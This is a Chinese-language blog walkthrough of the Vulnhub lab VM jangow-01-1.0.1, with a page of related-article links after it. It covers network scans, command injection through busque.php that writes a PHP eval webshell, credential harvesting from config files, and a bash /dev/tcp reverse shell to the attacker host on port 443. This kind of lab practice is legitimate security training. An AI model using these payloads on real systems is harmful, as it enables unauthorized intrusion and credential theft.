jangow-01-1.0.1靶机复现

最新推荐文章于 2025-12-26 15:11:46 发布
原创 最新推荐文章于 2025-12-26 15:11:46 发布 · 449 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #运维 #服务器

导入靶机

将我们下载好的jangow-01-1.0.1靶机导入vmware中

修改靶机网卡

这个靶机本来是在virtualbox上运行的,不修改配置的话,在vmware中仍然可以启动,但是用kali会扫描不到ip地址,原因是网卡不一样,我既安装了virtualBOX,又安装了vmware ,两个虚拟机管理工具可能会发生冲突,所以我们先来修改下靶机的网卡配置,确保我们不会发生错误。

调整靶机的网络模式

把靶机的网络模式调成和攻击机kali一样的网络模式,即NAT模式

修改网卡操作

在系统启动时显示以下界面 ,我们选第二个

继续选择第二个,按回车

会出现如下界面,按e进入编辑模式,进入以下界面

删除"recovery nmodeset"并在末尾添加"quiet splash rw init=/bin/bash"

修改后F10启动

编辑文件sudo vim /etc/network/interfaces 将网卡信息设置为ens33,重启靶机即可生效

扫描靶机ip

arp-scan -l

扫描到靶机ip为192.168.2.148

扫描端口

nmap -sS -A -O -sV -P- 192.168.2.148

发现靶机开放了21端口(ftp默认端口),80端口(http默认端口,http端口是直接可以访问到的)

访问192.168.2.148:80,发现是目录索引

进入site,发现是网站主页,没有发现有用的东西

执行目录扫描dirb http://192.168.2.148,也没有发现有用的东西,可以回到首页,点击其他项目

点到Buscar时发现地址栏变化,存在参数,尝试传参,发现没有对参数进行限制

尝试传入一句话木马

http://192.168.2.148/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]);' > shell.php

使用蚁剑连接

进入目录查看文件系统

在wordpress中找到了config.php文件,里面发现了账户密码等信息

接着又在html/.backup目录下发现了账户密码,此前扫描到靶机开放了21端口,尝试使用密码链接

发现是第二套密码,连接成功

反弹shell

在kali上开启监听 端口443,因为靶机只能用443端口

在靶机终端输入下面的命令

bash -c 'bash -i >& /dev/tcp/192.168.2.128/443 0>&1'

反弹成功

Paper_F1nd
关注
jangow-01-1.0.1
qq_46140711的博客
09-22 1324
jangow-01-1.0.1靶机练习
vulnhub——jangow-01-1.0.1靶机渗透 超详细
qq_48368964的博客
07-31 609
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。init用于指定内核挂载根文件系统后运行的第一个用户空间程序的绝对路径(也有文章描述为设置内核执行的初始化进程名)。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)重启进入系统,使用刚才修改的root密码进入root权限。
靶机实战 Jangow01(以及如何更改网卡名称)
TheLight9的博客
11-06 649
将这个下载下来的ova镜像,直接拖入虚拟机由于这个镜像文件是部署在virtualbox上的,他默认是桥接模式,所以我们拉进来以后,先改成NET模式然后,运行靶机,来到下图界面,鼠标点进去按E(一定要鼠标点一下,这一点很重要,不然按了没反应,它就加载进去了)E完会来到下图这个界面鼠标点进去,方向键一路向下,来到下图位置,将箭头所指的ro删除 替换为 rw signin init=/bin/bash。
Jangow-1.0.1 靶机教程
weixin_57682301的博客
07-31 257
4.在这里输入一句话木马 echo '<?6.打开蚂剑直接连接成功,即可进入。2.逐个点击页面中可以点击的位置。1.扫描目标主机地址。3.输入id发现有回显。5.输入ls查看文件。
Jangow-1.0.1打靶渗透【附POC】
网安学习
07-12 401
存在回显,可以利用,尝试写入一句话木马;存在敏感信息database、username、password;逐个点击到Buscar时跳转到空白页面,但是存在疑似可以利用的功能点。逐个点击页面存在的内容,查看是否有可以利用的点;尝试使用蚁剑连接->连接成功。
Jangow-1.0.1靶机
m0_61995767的博客
07-14 369
Jangow-1.0.1打靶记录
每周打靶练习之JANGOW1.0.1
chhsbsjs的博客
01-29 583
之后在原来的页面下随便点击功能点发现Buscar点进去就是刚刚扫描出来的空白页但是后面多了个参数,试试命令执行。发现该目录下还有一个wordpress目录,进去发现一个config配置文件,有数据库账号密码。然后试了各种方法都没有反弹回来,后来发现靶机只能通过443端口通信所以我们对命令进行一个修改。我们选择一个下载后上传上去,先上传到网站目录下我们在移到家目录下然后赋予权限。
jangow-01-1.0.1靶机
ybkj6666的博客
11-02 227
使用arp-scan 从网络接口配置生成地址,来查看ip输入命令:arp-scan -l输入命令:nmap -min-rate 10000 -p- 192.168.187.163可以看到开放2个端口输入命令:nmap -sU -min-rate 10000 -p- 192.168.187.163这里可以看到有一个80端口但是是关闭状态,那我们不用管它输入命令:nmap -sC -sT -sV -O -p 21,80 192.168.187.163输入命令:nmap --script=vuln -
Vulnhub靶机随笔-Jangow 1.0.1
weixin_59005129的博客
03-21 780
C.提权 内核提权 第三步 通过SCP将45010.c文件从Linux中传输到物理机中 在Windows的cmd中输入下方命令 这里需要将ssh的配置文件更改为允许root登录 命令: scp root@攻击机IP:文件所在位置 ./ 第五步 通过gcc编译45010.c文件 命令: gcc 45010.c -o exp 这里不用加-c参数
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2933
迟到的文章,就当库存发出来吧~
Vulnhub靶机JANGOW_ 1.0.1
LainWith的博客
10-06 1398
Jangow(此系列共1台)发布日期:202111月4日难度:低提示信息:爆破是拿下靶机的重要手段目标:取得 root 权限 + Flag主机发现端口扫描路径枚举命令执行反弹shellftp利用内核提权靶机练习-JANGOW: 1.0.1
Linux 中安装 Miniconda
m0_65788436的博客
12-23 299
在官网找到linux对应的下载命令,在根目录下运行下面的命令,下载即可。选择 Miniconda 的安装路径,输入回车,使用默认路径。是否更新您的 shell 配置文件以自动初始化 conda?此操作将在启动时激活 conda 并更改激活时的命令提示符。如果你选了 yes,以后你每次打开终端,最前面都会出现。字样,表示进入了 Conda 的基础环境。弹出是否接受协议,输入"yes",回车。弹出信息,继续按"Enter"如果你不希望 conda 的。根据提示,按"Enter"输入yes,回车,成功。
Linux上查看systemd journald日志
最新发布
yinminsumeng的博客
12-26 277
Linux系统日志查看方法摘要 本文总结了systemd journal日志的多种查看方式: 基础查看:使用journalctl命令可查看全部日志,-f实时跟踪,-b显示启动日志,-o指定输出格式(如json/verbose等)。 筛选过滤: 时间筛选:--since/--until指定时间范围 服务筛选:-u按服务单元过滤 优先级筛选:-p按日志级别(0-7) 字段筛选:_PID、_UID等按进程/用户过滤 关键字搜索:-g支持正则表达式 指定文件:可通过--file查看特定日志文件,包括持久化日志、运行
Linux 进程控制
2401_87277188的博客
12-22 607
本章重点①:学习进程的创建,fork/vfork②:学习进程终止,认识$③:学习进程等待④:写一个微型的shell(单独列一章),重新认识shell运行原理。
LInux cut 提取Git邮箱用户名命令解析
我的博客
12-23 277
这条命令用于。
Linux shell中设置串口参数
luotuo28的博客
12-22 162
本文介绍了在Linux shell中配置串口参数的多种方法。主要使用stty命令设置波特率、数据位、校验位和流控制等基本参数,提供完整配置示例;通过setserial命令配置硬件参数;展示C程序调用ioctl系统调用的实现方式;以及Python中使用pyserial库的配置方法。文章包含详细的命令语法、常用参数设置和完整脚本示例,涵盖了从基本终端配置到编程接口的多种串口设置方案。
Linux串口通信参数设置标志详解
luotuo28的博客
12-22 306
本文详细介绍了Linux串口通信参数设置的核心数据结构termios及其各字段配置方法。主要内容包括:1)控制模式标志(c_cflag)的数据位、停止位、校验位和硬件流控制设置;2)输入模式标志(c_iflag)的软件流控制和输入处理配置;3)输出模式标志(c_oflag)的原始/规范输出模式选择;4)本地模式标志(c_lflag)的规范/非规范模式切换;5)控制字符数组(c_cc)的超时和最小读取字符设置;6)波特率配置方法;7)完整的串口配置示例代码;8)实用函数如tcflush的使用。这些配置参数共同
Linux下快速安装配置Redis全攻略
u011023306的博客
12-23 318
本文简要介绍了在Linux系统上安装和配置Redis的完整步骤。首先安装GCC依赖并添加EPEL仓库,然后更新yum源并安装Redis。接着讲解了如何修改配置文件,包括允许远程连接和设置密码。最后说明了如何启动Redis服务、查看状态以及设置开机自启。整个过程涵盖了从安装到基本配置的全部关键操作,为快速部署Redis服务器提供了清晰指导。
QXlsx 库在麒麟 Linux(Qt 5.15.2)下完整安装步骤(含问题排查 & 经验总结)
MFC_ZLL的专栏
12-25 523
路径是核心:麒麟 Linux 下 Qt 手动安装的 qmake 路径()必须全程使用,避免版本冲突;源码要完整:务必下载 v1.4.4 稳定版,避免新版源码缺失.pro 文件;静态库安装要点:复制libQXlsx.a到、头文件到,并执行ldconfig;大小写敏感:Linux 下头文件是小写,代码中引用需匹配,否则找不到头文件。
milo-sdk-client 1.0.1
07-16
针对 **milo-sdk-client version 1.0.1** 的相关信息,包括下载、使用文档和更新日志,以下是详细的说明: ### 下载 Eclipse Milo 的 SDK 客户端通常托管在 Maven 中央仓库中,可以通过 Maven 或 Gradle 等依赖管理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值